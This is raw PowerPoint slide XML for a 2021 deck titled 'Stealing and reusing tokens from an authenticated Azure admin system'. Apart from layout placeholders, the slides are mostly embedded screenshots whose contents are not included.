      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3984354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669624-88A8-4AD1-A185-D3E7BE1025CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8013EE11-01AF-49DD-B9AC-E27C3573CAC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2294242-9A13-49EF-8BB1-497F2962CC21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1123834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BFF5-722B-48B3-8185-622C76ECE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7D39BF3-1239-45DA-A9B9-464E265B8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7684DB2-8CF1-42FE-8784-6787CC4E2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B2AA37-8997-486F-B535-FF1B1DAC1B91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4BBF93C-3ACA-4179-9541-91C53316D2F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1202C91-B4A7-4200-BD47-4C1FBBCAF5E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216492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173C-9988-48A7-879C-75117B5B46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18C66ADC-8D7A-4E82-8310-E436AD1CD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1322136-EEBD-4A64-BE90-43E5B5EA69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70F1A-5528-4500-ABDD-D6C19315FA65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{AB290257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B6EBEC-CC51-4072-A366-E8EC67416A2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FB2340D-14A8-40CC-B706-47604E2277F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C20C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224257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43EFF-F779-4AC2-8C2E-3BD29D76A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DE2509B-3FC2-4A59-B151-28A462934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795914D-0C32-45C9-86C1-65375B375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90257-7EB5-4453-9F8E-E7ACF5C41538}" type="datetimeFigureOut">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>10/12/2021</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFEA7B76-F47C-4091-B6CB-C566F17E0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1944B6D-32C0-4D3D-A53D-4456B780C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C5D4C-92D0-48DF-81E5-162E3EAF3CBF}" type="slidenum">
              <a:rPr lang="en-SG" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SG"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4072518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74C47DD-D770-418E-8AC7-1C5F7355BFFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2026693" y="1030406"/>
            <a:ext cx="8147713" cy="3081242"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stealing and reusing tokens from an authenticated Azure admin system</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" sz="4800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86AA1B7F-9037-47B8-9809-99BD1E6A1949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1559943" y="5171093"/>
            <a:ext cx="9078628" cy="860620"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Test at your own risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-SG">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1120030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DBBF27C-F41D-4FAE-8125-56FCB836D4D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="750570"/>
            <a:ext cx="11277600" cy="5356860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119596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A1B1685-DB86-40B6-AD2C-79F3EE5E8B71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1102996"/>
            <a:ext cx="11277600" cy="4652008"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3056535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5D5BB50-BDC1-4E40-9C22-DD2E91AB6C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1286256"/>
            <a:ext cx="11277600" cy="4285487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136903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CBC5774-9A3F-4EF2-BD8E-455D81759783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1610488"/>
            <a:ext cx="11277600" cy="3637024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1486675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49E22A9-B405-4323-8D19-E31F59925B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="849250"/>
            <a:ext cx="11277600" cy="5159500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161771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C33E40-1F73-470D-912B-1F2AF5CA8365}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="1953949"/>
            <a:ext cx="5291666" cy="2950102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5830FFF-7D60-4C9C-BE7A-06B442B3ED79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6256865" y="2516187"/>
            <a:ext cx="5291667" cy="1825625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4022818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7EECC8-2790-4E76-B3D2-D3796B53781E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="427595" y="2693257"/>
            <a:ext cx="11378339" cy="1829315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="642839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DF4B918-B314-4B6C-AB52-EB3916C89284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="637795"/>
            <a:ext cx="11277600" cy="5582410"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326902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C6CA42C-A4C1-4B9E-B4EF-E796BC3027C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="905637"/>
            <a:ext cx="11277600" cy="5046725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1480029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73AAF5-4C8E-4648-A207-DE201FC06094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583856" y="2403914"/>
            <a:ext cx="11221995" cy="2050172"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33471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84EC4D-F0E9-4DB3-8ABF-E2F40A04DA3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1666875"/>
            <a:ext cx="11277600" cy="3524249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18948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3FBBCB-CB62-4D78-8874-7EE0633E0B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="623486" y="2618989"/>
            <a:ext cx="10945027" cy="1620022"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="977324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B130905-6AD6-408E-8484-50BA06D9124B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990219"/>
            <a:ext cx="11277600" cy="4877561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="219671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9F476D5-CEB3-4125-86D9-775A70136578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067747" y="457200"/>
            <a:ext cx="4056506" cy="5943600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89189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5601B7-163A-470F-8471-F3769FEADBE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="840490" y="2607659"/>
            <a:ext cx="9935834" cy="1642682"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413588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DB076D7-7F34-4D0B-B2FA-E1C8DE42ADA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1910367" y="457200"/>
            <a:ext cx="8371266" cy="5943600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71119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0AE5268-985E-47AE-B5CC-1E6D6975CAA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="905082" y="457200"/>
            <a:ext cx="10381836" cy="5943600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332431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D7A8792-3128-488E-B6F5-9D70765E73C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1300353"/>
            <a:ext cx="11277600" cy="4257294"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1807835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802</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>50</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Stealing and reusing tokens from an authenticated Azure admin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Stealing and reusing tokens from an authenticated Azure admin system</dc:title>
  <dc:creator>Cheah, Eng Soon (SG/Advisory)</dc:creator>
  <cp:lastModifiedBy>Eng Soon Cheah</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-10T05:59:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-10T06:46:55Z</dcterms:modified>
</cp:coreProperties>
</file>